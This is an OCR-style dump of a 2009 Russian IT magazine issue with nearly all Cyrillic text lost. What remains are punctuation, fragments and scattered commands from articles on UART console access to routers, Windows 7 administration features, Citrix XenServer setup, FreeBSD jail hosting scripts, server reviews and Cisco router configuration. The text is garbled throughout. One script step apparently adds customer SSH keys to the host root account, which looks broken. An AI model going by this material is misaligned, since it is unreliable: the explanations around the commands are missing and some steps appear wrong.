0,1 4 5 . ,
5 , 5- UART RS-232.
USB UART, , ft232rl. Ubuntu
. Windows
. -,
.
, .

, ,
UART !
,
, .
?
, UART
, -
. : , ( -
UART
, -
.
:
,

). , .

, : , , .
, ,
,
, . ,
. Di Halta (z
#107) (z#110). ,
,
-
. , ,
, .

WiFi- WL-520GU ,
Stepa Level-up (z
#106), Linux. X 05 /125/ 09
>> phreaking

swap- .

, , ,
.
, UART.
. ,

( , , ). ,
chip-in-one: ,
, , , .
, , .
. UART, ! , +3,3 .
, , RX TX. ,
(
). , UART
-. , . , ASUS
.

,
RS-232 UART . , USB,
FT232RL,
.
X 05 /125/ 09
(
)
,
. MAX232.
, , , 3,3 ,
MAX3232, (
). +5 ,
, . 0,1 (4 ) .
, .
9- ,
- .
, DOS
.
. , -
, !
9- ,
, , (,
). -
;
5- . RX TX .
3- , 2-.
, 2- ,
3-. , TX RX.
- !

, MAX232 ,
. RX TX .
117
>>
>> pc_zone
phreaking
, UART

.
. + 5
, , . 5 ,
.
. .

. : Hyper Terminal,
, 115200
. . Ubuntu,
. ,
-. 1 ttyS0 (
FT232,
ttyUSB0). minicom.
: minicom -l -8 -c on -s .
:
/dev/ttyS0
// 115200 8N1

-
.
. , <ctrl-a
z>. , : /
.
,
.
.
RX TX. - 2- 3-
. - :
, , . ,
. ,
. , , , , ,
.
RX-TX
, .
,
. ,
, , .
118

, ,
SSH .
Linux-, . ,
UART, .
. -
.
,
, . Palm m100. , ,
, , ,
. , - .
, , , . ,
, WinCE, .
, UART.
, ,
. ,
, , . ,

, . ,
. , . , .z
X 05 /125/ 09

2100 . ( 15%
)
. ,

!
!

+ + DVD:
- 155 ( 25% , )
12
3720
2100
+DVD 6
1200 .
1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
:

;
20
.
,
.
, . ,
, .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru
>> SYN/ACK
TURBINA
/ V.TURBINA@GMAIL.COM /

Windows 7
Windows 7 IT-
>> SYN/ACK
Windows 7
IT- . , Vista Win2k8, , ,
,
. .

, .
USMT (User State Migration
Tool) Windows AIK (Windows Automated
Installation Kit,
Windows).
, ,
Microsoft.
USMT 4.0 . ScanState ( ) LoadState ( )
UsmtUtils . UsmtUtils . /ec

(AlgIDs) . /d
, ,
, ScanState.
, . ScanState/LoadState -
XML- :
MigApp.xml, MigUser.xml, MigDocs.xml, Config.
xml ( /genconfig).
,
120
ScanState
(,
Windows PE) .
Config.xml
. ,
<ErrorControl>
, / , .
/genconfig Config.xml
, .
MigXmlHelper.FileProperties MigXmlHelper.
GenerateDocPatterns
(,
..)
. , ,
/listfiles. <ProfileControl>
.
.
, ,
, ,
.
.
,
. ,
,

. ,
.
WAIK

(Hard Link Migration),
/hardlink.
, , .
ScanState c:\store /o /c /i:migapp.xml
/i:miguser.xml /nocompress /hardlink
c:\store
.
(
, ).
, , , ,
. Hard
Link Migration XML-
<HardLinkStoreControl>.
/vsc ScanState

(Volume Shadow Copy)
, .
X 05 /125/ 09
>> SYN/ACK
USMT 3DES,
/encrypt AES
128/192/256 .
WAIK
DISM (Deployment Image Servicing and
Management), WIM- Vista
SP1, Win2k8, Win2k8 R2 Windows 7. DISM
Package Manager
(pkgmgr.exe), PEimg Intlcfg, ,
,
Windows 7 Win2k8 R2.
(

). WIM,
VHD-.
, Windows 7
VHD- ,
VHD Boot
.
WAIK Windows
7 Win2k8 R2
WinXP SP3, Vista SP1 Win2k3.

Windows Easy
Transfer.
X 05 /125/ 09

, Vista Win2k8, Windows 7. , SMB
2.0
,
,
, SMB 1.0. TCP/IP
, SMB
1.0 (64 ),
.
,
3 !
SMB 2.0
NTFS
.
Vista, SMB 2.0 ;
.
Windows 7
BranchCache,

. .

,
. , ,
,
. , , , ,
. BranchCache
HTTP/
HTTPS SMB, .

:
Hosted cache ,
Win2k8 R2.
.
Distributed cache ,
()
.
BranchCache . , ,
,
.
, ,
.

VPN,
121
>> .PRO
WF; : )
(, ). Vista WF,

Windows. : , ,
, IPv6 IPsec,
Group Policy
Object (GPO). WF Vista
(domain, private, public), .

. , domain, public.
,
Network Location Awareness (NLA), .
( )
,
.
,
. .
WF Windows 7 ,
.
Private Public
,
(Block all incoming connections, including
those in the list of allowed programs), . (Notify
me when Windows Firewall blocks a new program).
WF . .
,
. ,
. Vista,
,
; .
, API,
WF .
UAC
Windows ,
,
,
. , - ,
, ..
. Unix .
Windows Vista,
, UAC ( ). UAC

.
, (
Secure Desktop, ). . UAC
: ,
122
>> SYN/ACK

/ STEP@GAMELAND. RU/
UAC
.
,
UAC
Vista
. UAC Vista ,
/
. Unix , Windows
- . ,
Vista, UAC.
TweakUAC (www.tweak-uac.com),
UAC,
. UAC ,

.
,
Windows 7 UAC.
Control Panel System and Security Change
User Account Control setting:
Always notify ( Vista);
Default ( ) ,
; , UAC ;
Notify me only when programs try to make changes to my
computer , Secure Desktop
UAC ;
Never notify you UAC.
,
, Default . ,
UAC , ,
,
UAC. ,
RC1.

Windows 7 . Vista .

.
Win2k8 R2
(Windows Server 7).
.z
INFO
info
WAIK

z 2009 .
Windows 7 Beta
Microsoft

- .

winver,
,

Windows 7,

.
DirectAccess
,
,
X 05 /125/ 09
>> SYN/ACK
BitLockerToGo
Windows 7
HTTP://WWW
links
-
Windows AIK
Windows 7
technet.
microsoft.com/
library/dd349343.
aspx.

Windows 7 blogs.
msdn.com/e7ru.
, ,
. Windows 7 Win2k8 R2

DirectAccess, IPsec IPv6,
3DES AES.
VPN. DirectAccess VPN
.
, .

,
. ,
(, -).
. , Windows 7 .
,
.
/,
.
RDP, Remote
Desktop Client .
Aero Glass, Direct2D Direct3D 10.1,
DirectShow, Media Foundation. , .
.

Windows 7
AppLocker, .
, , . ,
:
(exe, msi, msp), (bat, cmd, vbs, js) (dll, ocx).
122
SRP (Software Restriction Policies).

AppLocker
Win2k8 R2.
, .
,
, PC Safeguard,
Turn On
PC Safeguard ( )
. , (
). .
, PC Safeguard, Windows
SteadyState (go.microsoft.com/fwlink/?LinkID=117104).
, ,
. BitLocker,
( Vista SP1), Windows 7
.
( ), BitLocker. , .
, BitLockerToGo,
(
), FAT/FAT32, ExFAT
NTFS.
- . ,
Windows 7, .
BitLocker
,
Turn On BitLocker ( ).
.
WINDOWS FIREWALL
Windows ,
. WinXP SP1, Windows Firewall, SP2 . ,
, WF.
, (
X 05 /125/ 09
>> SYN/ACK
WF; : )
(, ). Vista WF,

Windows. : , ,
, IPv6 IPsec,
Group Policy
Object (GPO). WF Vista
(domain, private, public), .

. , domain, public.
,
Network Location Awareness (NLA), .
( )
,
.
,
. .
WF Windows 7 ,
.
Private Public
,
(Block all incoming connections, including
those in the list of allowed programs), . (Notify
me when Windows Firewall blocks a new program).
WF . .
,
. ,
. Vista,
,
; .
, API,
WF .
UAC
Windows
,
, , .
, - , ,
.. .
Unix . Windows
Vista, ,
UAC (
). UAC
.
,
( Secure Desktop,
). .
UAC :
,
X 05 /125/ 09
UAC
.
, UAC
Vista
. UAC
Vista , /
. Unix ,
Windows - . ,
Vista, UAC.
TweakUAC (www.
tweak-uac.com),
UAC, .
UAC ,
.
,
Windows 7 UAC. Control Panel System and Security Change User
Account Control setting: Always notify
( Vista); Default ( ) ,
;
,
UAC ;
Notify me only when programs try to make changes to my
computer , Secure Desktop
UAC ;
Never notify you UAC.
,
, Default . ,
UAC , ,
,
UAC. ,
RC1.

Windows 7 . Vista .

.
Win2k8 R2 (Windows Server
7). .z
INFO
info
WAIK

z 2009 .
Windows 7 Beta
Microsoft

- .

winver,
,

Windows 7,

.
DirectAccess
,
,
123
>> SYN/ACK
GRINDER
/ GRINDER@SYNACK.RU /
Citrix XenServer:
>> SYN/ACK

.
. ,
, (,
). Citrix ,
XenServer, 5.0, .
. ,
,
. ,

, .
,

: Microsoft Hyper-V,
VMware ESX Server, Parallels Desktop/Workstation/
Server, Qemu, VirtualBox, Virtual Iron, XenServer,
Oracle VM ..
Xen,
,
Intel VT
AMD SVM.
CITRIX XENSERVER 5.0
XenServer
, .
:
;
;
(Live Motion)

124
, .
, .
. XenServer

(High Availability).
, ,
(P2V) . ( ,
NAS, SAN ..).
:
Windows, 2k SP4 2008,
64-
, WHQL
(Windows Hardware Quality Lab);
SUSE Enterprise Linux 9 32/64 ;
Red Hat Enterprise Linux 3. CentOS 4.5;
Oracle Enterprise Linux 5.0;
Debian Sarge/Etch.
.
: 8 CPU (64-) ,
( CD-ROM)
. .

:
, , VM.
, VM, XenCenter.
, XenServer .
CITRIX XENSERVER XenServer ,

1.5 64 CPU, 1 RAM
16 . : XenServer
4 VM. ,
. ,
Vista 16
,
20 (4 + 16 ).
2,
5. ,

. Windows Intel VT/AMD-V;
Linux .
ISO-
www.xenserver5.com.
X 05 /125/ 09
>> SYN/ACK
,
-. ,
, .
, ,
, , .
. , 2-3 , .

( 3-5
, XenServer, ESXi Server Hyper-V) . ,
,
.
, Parallels
(www.parallels.com/ru).
, install-cd linux-cd. ,
,
XenServer,
XenCenter PVD- Windows, .
(templates), Linux (Debian Sarge/Etch).
XenServer
Linux. : , ,
( , ).
install-cd ( ,
PXE).
(Standard) (Advanced). <Enter>. ,

( us), . , Install or upgrade
X 05 /125/ 09
XenServer host.
( )
VM.
, .
. Intel VT/AMD-V,
BIOS,
XenServer . , NFS HTTP/FTP.
,
, , Intel VT/AMD-V
Linux.
Linux- ( , ). .
root, (DHCP, IP-, , , DNS-
). , ,
IP-!
.
, , Install XenServer.
, .
,
Customize System. 14 ,
, VM,
, , , /
,
.. . ,
.

,
. , ,
root.
,
. Local
Command Shell, root,
,
install.sh:
# mount /dev/cdrom /media
# cd /media
# ./install.sh
XenCenter.
XenCenter , Windows
125
>> SYN/ACK
XenConvert
Windows-

HTTP://WWW
links
-, XenServer
5- www.
xenserver5.com.

( )
XenServer

docs.xensource.com/
XenServer/5.0.0.
VM Guru

www.vmgu.ru.
WARNING
warning
XenServer
.
.
126
storage repository
XP/2003/Vista.
.NET Framework 2.0 . XenCenter
client_install . ,
, XenServer,
4.x,
. .
XenCenter
. , XenCenter :
xbk XenServer;
xsupdate xsoem
XenServer;
xslic XenServer;
xva VM;
xensearch .
XenCenter , , , , .
. , Tools Options
Updates.
, .
XenServer, ,
. , . , Saved Searches
Panel,
.
VM XenServer
Add your XenServer, IP , root Connect.
, Save and restore server connection .
.

master Password,
.
,
New VM. , 6-7
. <F1> . (templates).
VM. ,
.
. ,
VM
Other install media,

. , Debian
ready-to-use, .
. VM ,
VM. Location ,
. Debian,
.
CPU ,
VM. , ,
CPU,
VM .
Virtual Disk. ,
VM. , , , ,
. , Debian :
0,5 4 . .

, Add Edit
Disk Settings (). Read Only . ,
.
Finish ,
. Start VM automatically, VM
Citrix
Essentials for
XenServer
Citrix
Citrix Essentials,
Citrix Essentials for XenServer (www.citrix.com/
essentialsxs) Citrix Essentials for Hyper-V (www.
citrix.com/essentialshv). ( )
.
High availability ;
(Citrix WorkFlow Studio);

(Citrix Provisioning Server);

(Citrix StorageLink).
X 05 /125/ 09
>> SYN/ACK
VM
XenCenter
P2V
XenServer
. Debian root VNC .

SSH .
VM . ,
, .
, (,
), .
, Log.
CPU,
,
Properties.
Memory and VCPUs. VCPU priority
.
Properties . , Startup Options
. ,
,
Alert, (CPU,
), .
Alert . Properties Email Notifications,
, . , XenCenter
.
Tools Get Server Status Report 4- ,
. . VM General, Tags. ,
New tags .
VM ,
.
.
X 05 /125/ 09
XenServer XenConvert.
Windows , VHD- XVA-,
XenServer. :
, , . Linux-, ,
Convert an existing OS on this machine to a VM (P2V).

Server Back Up Server/Restore From Back Up.
CPU, RAM
VM , Performance. , , .
,
Configure Graphs (
). ( )
Tools Options Performance Graphs.

, XenServer
Storage Repository (SR). SR,
-, . , , SR
.
XenServer, ,
VM.
VM. SR . New Storage New SR Storage .
,
. SR . SR
XenServer.
VM
Storage. Storage New Virtual Disk, ,
Storage Attach Virtual Disk.z
INFO
info

Microsoft
Hyper-V,
,

2009 .
QEMU

z 2008 .

Physical to Virtual
Conversion (P2V).
127
>> SYN/ACK
J1M
/ ZOBNIN@GMAIL.COM /
>> SYN/ACK
FreeBSD-
FreeBSD jail
FreeBSD-. ,
.
-.

$$$
FreeBSD- , jail-,
IP-.
,
.
,
, WMZ
IP- ,
N- / ssh-.
,

, ,
,
.

.
,
, (en.wikipedia.org/wiki/Cloud_
computing),

.
FreeBSD-
N-
IP- ( ), ,
,
FreeBSD.
,
, ,
. jail
: -
! .
, ,
128
,
.
SEO-

.
:
1. IP-
.
,
IP- .
2. jail. unionfs
nullfs , .

.
3. /usr/ports/distfiles /
usr/ports/packages ,
, , .
4. , ,
.
5.
FreeBSD- .
6.
.
7. .
8. ssh
.
https.
9. : trial , base , extra, vip . .

,
,

.
,
,
:
1. FreeBSD-
/usr/jailbase/FreeBSD-.
2. ,
(/, / . .)
3. ,
.
FreeBSD-,
/usr/jailbase
,
:
/usr/jailbase/FreeBSD-
FreeBSD,
.
/usr/jailbase/distfiles-
/usr/ports/distfiles
nullfs.
/usr/jailbase/packages-
/usr/ports/packages
nullfs.
/usr/jailbase/db jail-. IP-
,
(, /usr/jail),
, ,
, e-mail ,
,
, .
/usr/jailbase/defaults
.
/usr/jailbase/conf/
:
trial, base, extra, vip, .
db
passwd (,
).
: none , disabled
, ok
X 05 /125/ 09
>> SYN/ACK
>> SYN/ACK
( ). ,
,
IP-,
,
(: 192.168.0.1---none). ,
,
none
(
: 192.168.0.1:/usr/jail:ed0:jail.host.com:7.1RELEASE:vasya@mail.ru:trial:0903031700:ok).

ok, , ,
IP-
.
-

/usr/jailbase/FreeBSD-. /usr/src :
# JAIL=/usr/jailbase/FreeBSD-'uname -r'
# mkdir -p $JAIL
# make world DESTDIR=$JAIL
# make distribution DESTDIR=$JAIL

FreeBSD 7.1, /usr/jailbase/FreeBSD7.1RELEASE. ( IP-
):
# jail $JAIL base.jail 192.168.0.1 /bin/sh
# touch /etc/fstab
# newaliases
# tzsetup
# echo nameserver 127.0.0.1 > /
etc/resolv.conf
rc.conf , addvserver
. :
,
.
/etc/motd
:
# vi /etc/motd
, exit.
$JAIL/usr:
# cp -a /usr/ports $JAIL/usr
X 05 /125/ 09
:
# rm -Rf $JAIL/usr/ports/distfiles
$JAIL/usr/ports/packages
# mkdir $JAIL/usr/ports/distfiles
$JAIL/usr/ports/packages
!
,

addvserver.
/usr/jailbase/distfiles-
/usr/jailbase/packages-,
nullfs:
# mkdir /usr/jailbase/
{distfiles,packages}-'uname -r'

(addvserver):
# vim /usr/jailbase/defaults
# .

.
IF=nfe0
#
.
JAILDIR=/usr/jail

. ,
IP::::::::none,

IP-.
.
,
DNS- .
.
BIND9, DNS-,
, .
:
1. , ,
:
$ dnssec-keygen -a HMAC-MD5 -b 128 -r
/dev/urandom -n USER NSUPDATE

Knsupdate.+157+36521.key
Knsupdate.+157+36521.private. addvserver delvserver

,
/usr/jailbase:
# cp Knsupdate.* /usr/jailbase/
/etc/namedb/named.conf
:
# vim /etc/namedb/named.conf
//
controls {
inet 127.0.0.1 allow { localhost;
} keys { "NSUPDATE"; };
};
// ,
secret 'Key:'
Knsupdate.+157+36521.private
key NSUPDATE {
algorithm HMAC-MD5.SIG-ALG.REG.INT;
secret VF5l+ZIdDcPjhDz1+eG3Jw==;
};
// host.com,

zone "host.com" {
type master;
file "host.com.db";
allow-update { key "NSUPDATE"; };
notify yes;
};
// ,
, IP-
zone "67.16.172.in-addr.arpa" {
type master;
file "host.com-reverse.db";
allow-update { key "NSUPDATE"; };
notify yes;
};
host.com (
):
# vim /etc/namedb/host.com.db
$TTL 86400
@
IN
SOA @ root (
1 28800 7200 604800 86400 )
IN
NS
dns
dns
IN
A
172.16.67.1
# vim /etc/namedb/host.com-reverse.db
$TTL 86400
@
IN
SOA @ root (
1 28800 7200 604800 86400 )
129
>> SYN/ACK
jls
IN
IN
NS
PTR
dns
dns.host.com.
, ,
, . bind:
# /etc/rc.d/named start

, ,
, :
1. addvserver
, /usr/jailbase/db, DNS.
2. delvserver ,
.
3. disablevserver , (
'disabled').
4. enablevserver (
'ok').
5. startvserver ,
/usr/jailbase/db.
6. stopvserver .
7. vservers /usr/local/etc/rc.d,

.
8. watchvservers , cron, (, ).
-, , add, del, start stop,
.
, , addvserver (
; ):
# vim /usr/local/bin/addvserver
#
HOSTNAME=$1; OSVER=$2; EMAIL=$3; ACTYPE=$4; TIME=$5;
KEY=$6
JAILBASE=/usr/jailbase
DB=$JAILBASE/db
#
. $JAILBASE/defaults
# IP-
STRING='grep ':none$' $DB'
IP='echo $STRING | cut -d ':' -f 1'
#
cp -a $JAILBASE/FreeBSD-$OSVER $JAILDIR/$IP
#
RCCONF=$JAILDIR/$IP/etc/rc.conf
echo "hostname=\"$HOSTNAME\"" > $RCCONF
echo "network_interfaces=\"\"" >> $RCCONF
echo "rpcbind_enable=\"NO\"" >> $RCCONF
echo "sshd_enable=\"YES\"" >> $RCCONF
# /root/.ssh
mkdir -p $JAILDIR/$IP/root/.ssh
cat $KEY >> /root/.ssh/authorized_keys2
130
/usr/jailbase
# DNS
UPREQ=$JAILBASE/upreq
echo "update add $HOSTNAME 86400 A $IP" > $UPREQ
echo "send" >> $UPREQ
nsupdate -k $JAILBASE/Knsupdate.*.private $UPREQ
rm -f $UPREQ
#
sed "/^$IP.*/s##$IP:$JAILDIR:$IF:$HOSTNAME:$OSVER:$EMA
IL:$ACTYPE:$TIME:ok#" $DB > ${DB}.new
mv ${DB}.new $DB
# IP
echo $IP
( , , e-mail , ,
, ) IP
.
delvserver .
db, , (
none),
( STRING db):
# vim /usr/local/bin/delvserver
#
JAILDIR='echo $STRING | cut -d ':' -f 2'
rm -Rf $JAILDIR/$IP $JAILDIR/${IP}.ipfw
# DNS
HOSTNAME='echo $STRING | cut -d ':' -f 4'
UPREQ=$JAILBASE/upreq
echo "update delete $HOSTNAME A" > $UPREQ
echo "send" >> $UPREQ
nsupdate -k $JAILBASE/Knsupdate.*.private $UPREQ
rm -f $UPREQ
# none
NEWSTRING='echo $STRING | sed "/$STATUS/s##none#"'
sed "/^$IP.*/s##$NEWSTRING#" $DB > ${DB}.new
mv ${DB}.new $DB
disablevserver,
, delvserver, ,
, disabled. ,
NEWSTRING : NEWSTRING=`echo $STRING |
sed "/$STATUS/s##disabled#"`.
enablevserver - disablevserver, 'ok' 'disabled'.
startvserver .
IP- , ( 'ok')
. 4 (ruleset 4) devfs jail- /etc/defaults/devfs.rules.
, /etc.
# vim /usr/local/bin/startvserver
# ,
JAILDIR='echo $STRING | cut -d ':' -f 2'
IF='echo $STRING | cut -d ':' -f 3'
X 05 /125/ 09
>> SYN/ACK
umount $JAILDIR/$IP/usr/ports/packages
umount $JAILDIR/$IP/dev
umount $JAILDIR/$IP/proc
ifconfig $IF inet -alias $IP
,
vservers, vservers_enable /etc/rc.conf, . :
# vim /usr/local/etc/rc.d/vservers
#
VSERVERS='cat /usr/jailbase/db | grep -e ':ok$' | cut -d
':' -f 1'
#
vservers_start()
{
for IP in $VSERVERS; do
/usr/local/bin/startvserver $IP
done
}
/usr/local/etc/rc.d/vservers
HOSTNAME='echo $STRING | cut -d ':' -f 4`

OSVER='echo $STRING | cut -d ':' -f 5`
# jail-
ifconfig $IF inet alias $IP
mount -t devfs none $JAILDIR/$IP/dev
devfs -m $JAILDIR/$IP/dev ruleset 4
mount -t procfs none $JAILDIR/$IP/proc
mount_nullfs $JAILBASE/distfiles-$OSVER
$JAILDIR/$IP/usr/ports/distfiles
mount_nullfs $JAILBASE/packages-$OSVER
$JAILDIR/$IP/usr/ports/packages
jail $JAILDIR/$IP $HOSTNAME $IP /bin/sh /etc/rc
stopvserver ,
, , jls JID ( jls):
# vim /usr/local/bin/stopvserver
# ,
STRING='jls | grep $IP'
if [ ! "$STRING" ]; then
echo " $IP
exit 3
fi
# jid
JID='echo $STRING | cut -d ' ' -f 1'
# jail-
killall -j $JID -TERM > /dev/null 2>&1
sleep 1
killall -j $JID -KILL > /dev/null 2>&1
umount $JAILDIR/$IP/usr/ports/distfiles
X 05 /125/ 09
#
vservers_stop()
{
for IP in $VSERVERS; do
/usr/local/bin/stopvserver $IP
done
}
. .
,
IP- !
, ,
:
# IP='addvserver new.host.com 7.1-RELEASE vasya@mail.ru
base 0906061200 ///'
# startvserver $IP
:
# stopvserver $IP
# delvserver $IP
-,
,
, ,
( ).

. ,
, , ,
,
FreeBSD-. z
131
>> SYN/ACK
NATHAN BINKERT

/ NAT@SYNACK.RU /

DEPO Storm 1150N5

>> SYN/ACK
>
Intel Pentiu m dual-core E2200/ E5200
Intel Core 2 Duo E7200 /E8400
>
8 DDR2-800
>
8 5.25"
> RAID
SATA RAID- Intel
ICH9R (RAID 0,1,5,10), 6

>
2- Gigabit Ethernet
10/100/1000 (Intel 82573)
>
700 500 (2x500 )

>

(, ) 591*430*221, 591*449*330, 695*355*545
25
19" .
500 .
5U
DEPO Storm 1150N5, DEPO Computers,

. , , -
Pedestal, 45 ,
DNS-, DHCP-, -, .
RAID- 4 8
- web-.
- SATA RAID- Intel ICH9R.
,
,
RAID-.
132
, , SAS/SATA RAID- LSI

Logic Adaptec 4 8 (

-).
5 .
Intel
3200 2-
Intel 82573V+82566DM XGI Z9S 16 .
()
DDR2-800.
DVD-ROM FDD, , , . , 1000
, 19".

. DEPO Computers MS
Windows 2008 Standard ,
MS SharePoint Services 3.0 MS
Hyper-V.
.
,
.
,
Intel Pentium dual-core E5200, 1
, 250
700 , 33578
. z
X 05 /125/ 09
>> SYN/ACK
NATHAN BINKERT
/ NAT@SYNACK.RU /

IBM System x3250 M2:
1U-
IBM
System x3250 M2:
>> SYN/ACK
> ( ):
Intel Xeon 3360 () (2,83 ,
1333 FSB, 12 )
Intel Xeon 3120 () (3,16 ,
1333 FSB, 6 )
Intel Core 2 Duo E7200 (2,53 , 1066
FSB, 3 )
Intel Celeron (2 , 800 FSB, 512 )
> RAID:
RAID-0, -1
,
RAID-5
> :
Gigabit Ethernet (GbE)
> :
350
> :
8
DDR2-667/800
> :
1 PCI Express x8
1 PCI Express x4
> :
3,5-
SATA,
3,5- SCSI (SAS)/SATA,
2,5- SAS
> -
4 USB 2.0 (2 , 2 )
1 VGA (D-Sub)
2 (DB-9M)
PS/2
IBM System x3250 M2 ,

. , , .
, ,
RAID 0, -1 ( 36800
)

web-, Active Directory, ,
DNS-, DHCP-, - .

. Intel
Celeron 2
.
3,5-
SATA, 3,5-
SAS/SATA 2,5- SAS.
,
, .
RAID-
RAID-0, -1,
RAID-5 PCI-Express. - 1U ,
.
Calibrated Vectored Cooling (CVC) -
X 05 /125/ 09
> :
IPMI 2.0- mini-BMC2, RSA II SlimLine
ATI ES1000
32
DVD+/-RW
> :
Calibrated Vectored Cooling (CVC)
> :
/1U, 22"
> :
1 3

,
.

. - miniBMC2, IPMI
2.0 (
). , miniBCM2
RAID-.
RSA II SlimLine (en.wikipedia.org/wiki/
IBM_Remote_Supervisor_Adapter).
MS Windows 2003, Novell NetWare 6.5
Linux- Red Hat Enterprise Linux R5
SUSE Linux Enterprise Server 10. z
133
>> SYN/ACK
VASILIY CANAVAR OZEROV
/ FR33M2N@GMAIL.COM /

Cisco
>> SYN/ACK
, Cisco Systems
CCIE? .

CISCO.
,

. ,
$10, .
(Xenomips, GNS3, Boson
Router Simulator),
. Cisco,

.
, Cisco 1721
WIC-4ESW ( 4
) 10k . ,
(
20, ).
, ,
,
.
CISCO IOS IOS (Internetwork Operation System,
) Cisco

. -, IOS ,
, IOS- (,
torrents.ru/forum). . ,
IOS : c1700-ipbasek9-mz.124-12.
bin ( ).
:
c1700 , IOS
17- ;
ipbasek9 ; ipbase

, , , RIP, OSPF,
134
EIGRP, IPv4, NAT VLAN'

(802.1q ISL); k9 ;
mz ,
( tar);
124-12 .
IOS'
Feature Navigator.
Cisco: tools.cisco.com/
ITDIT/CFN/jsp/index.jsp.
IOS , , . ,
IOS, :
cisco#show version

, ,
, ,
.
:
(: ) IP,
IP, PPTP-.
192.168.1.0/24
192.168.3.0/24.
(DMZ) 10.10.20.0/24.
:
1. Cisco
PPTP-.
2.
( IP).
3. IP DMZ .
4. DNS DHCP .
,
. ,
,
, COM-.
,
COM- 9600. ,
HyperTerminal,
Windows.
<Enter>
enable.
, ,

( ping, traceroute).

configure terminal.
.
,

IP- .
, WIC-4ESW
switch-,
IP- (L2 switching).

VLAN'. , :
VLAN ,
,
(
), (

VLAN).
,
,
IP- ,
, .

,
:
X 05 /125/ 09
>> SYN/ACK
INTERNET
ISP #1
172.16.0/16
CISCO 1721
WEB SERVER
ISP #2
10.2.135.0/24
DMZ
10.10.20.0/24
cisco#vlan database
cisco(vlan)#vlan 2
VLAN 2 added:
Name: VLAN0002
cisco(vlan)#ex
vlan-:
cisco#conf t
! vlan 2
cisco(config)#int vlan 2
! IP
cisco(config-if)#ip-address
192.168.1.254 255.255.255.0
cisco(config-if)#^Z
,
vlan:
!
fastethernet 4
cisco(config)#int fa4
! ( trunk)
cisco(config-if)#switchport mode
access
! vlan
cisco(config-if)#switchport access
vlan 2
, :
cisco#sh ip int brief vlan 2
InterfaceIP-AddressOK?MethodSt
atusProtocol
X 05 /125/ 09
LOCAL NETWORK#2
192.168.3.0/24
Vlan2192.168.1.254YESmanual up
up
cisco#sh ip int brief fa4
InterfaceIP-AddressOK?Method
StatusProtocol
FastEthernet4unassignedYES
unsetupup
cisco#sh vlan-switch
VLAN Name
Status
Ports
-------------------------------1
default
active
2
VLAN0002
active
Fa4
... skipped ...
. .

,
.
description,
. ,
,
.
PPTP-
, ,
VPN-
PPTP . ,

L2TP. , ,
,
.
LOCAL NETWORK#2
192.168.1.0/24
?, .
,
PPTP.
cisco(config)#service internal
vpdn (Virtual Private

Dialup Network):
! vpdn
cisco(config) #vpdn enable
! 1
cisco(config) #vpdn-group 1
cisco(config-vpdn) #request-dialin
!
cisco(config-vpdn-req-in)#protocol
pptp
cisco(config-vpdn-req-in)#rotarygroup 0
! VPN
cisco(config-vpdn)#initiate-to ip _vpn_
server_ip_
, _vpn_server_ip_
IP- VPN. ,
:
! VPN-
cisco(config)#interface Dialer0
! mtu
cisco(config-if)#mtu 1440
! IP-
cisco(config-if)#ip address
negotiated
135
>> SYN/ACK
Cisco Systems
INFO
info
Cisco IOS ,
, ,
.
CLI

Cisco IOS.
Dynamips Cisco.

,

Cisco IOS.
Windows,
Linux-,
Mac OS X.

VLAN'

,

z 2009 .
136
!
"up"
cisco(config-if)#ip pim dense-mode
! ppp
cisco(config-if)#encapsulation ppp
cisco(config-if)#dialer in-band
cisco(config-if)#dialer idle-timeout 0
cisco(config-if)#dialer string 123
cisco(config-if)#dialer vpdn
! dialer-list'
cisco(config-if)#dialer-group 1
! cisco discovery protocol

cisco(config-if)#no cdp enable
!
cisco(config-if)#ppp chap hostname _login_
cisco(config-if)#ppp chap password 0 _
password_
dialer-list, (
IP), :
show version

. :
cisco(config)#ip route 0.0.0.0 0.0.0.0 ISP1_GW
. Access List.
,
NAT. ,
, :
! access-list 1
cisco(config)#access-list 1 permit
192.168.1.0 0.0.0.255
cisco(config)#access-list 1 permit
192.168.3.0 0.0.0.255
ACL , permit deny ,

(permit) (deny) .
NAT- , .
ACL. , :
, ACL.
cisco(config)#dialer-list 1 protocol ip permit
. VPN-
. :
cisco#sh ip int dial0
InterfaceIP-AddressOK?MethodStatusProtocol
Dialer0xxx.xxx.xxx.xxxYESIPCPupup
!
.
,
,
.
NAT' ,
!
access-list 1
cisco(config)#ip nat inside source list 1
interface Vlan4 overload
vlan 4.
,
, .
ip nat inside ip nat outside . :
cisco(config-if)#ip nat inside
cisco(config-if)#int vlan 4
cisco(config-if)#ip nat outside
X 05 /125/ 09
>> SYN/ACK
VLAN
Cisco 1721.
vlan2 , vlan4 .
.
, , . , 80.
Web-,
DMZ. Web- ,
. ,
default route ISP1_GW .
, , , - , ,
. , , .
: IP,
- . Policy Based
Routing. ACL, , :
! access-list 100
! ,
X 05 /125/ 09
Cisco 1721. . WIC-4ESW,

Serial Console

cisco(config)#access-list 100 deny tcp host 10.10.20.2
eq www 192.168.1.0 0.0.0.255
cisco(config)#access-list 100 deny tcp host 10.10.20.2
eq www 192.168.3.0 0.0.0.255
cisco(config)#access-list 100 permit tcp host 10.10.20.2
eq www any
deny , , - , .
WEB:
cisco(config)#route-map WEB permit 10
! , access-list 100
cisco(config-route-map)#match ip address 100
cisco(config-route-map)#set ip next-hop 172.17.0.1
match , ;
set ip next-hop hop. -
137
>> .PRO
SYN/ACK
Cisco IOS
IP
. -,
Web-. -,
Web-. -, , DMZ.
:
cisco(config)#ip nat inside source static tcp _web_
server_ip_ 80 xxx.xxx.xxx.xxx 80 extendable
:
cisco(config)#ip nat inside source list 100 interface
Dialer0 overload
, Dialer0, ip nat outside, IOS NAT' .

:
cisco(config-if)#ip policy route-map WEB
, , DNS DHCP.
DNS DHCP
, Cisco , DNS-.

. DNS
. DNS , , - .
:
! DNS
cisco(config)#ip name-server abc.abc.abc.abc
cisco(config)#ip name-server bca.bca.bca.bca
! DNS
cisco(config)#ip dns server
! primary test
cisco(config)#ip dns primary test soa ns.test postmaster.test
! NS
cisco(config)#ip host test ns ns.test
! A
cisco(config)#ip host ns.test 192.168.1.254
cisco(config)#ip host anyhost.test 192.168.1.250
138
IP Base ,
<<feature sets>>. ,
, RIP, OSPF, EIGRP, IPv4.
VLAN (802.1Q ISL) NAT.
IP Services ( L3 ) , NAT, IP SLA.
Advanced IP Services IPv6.
IP Voice VoIP VoFR.
Advanced Security IOS/Firewall, IDS, SSH IPSec
(DES, 3DES AES).
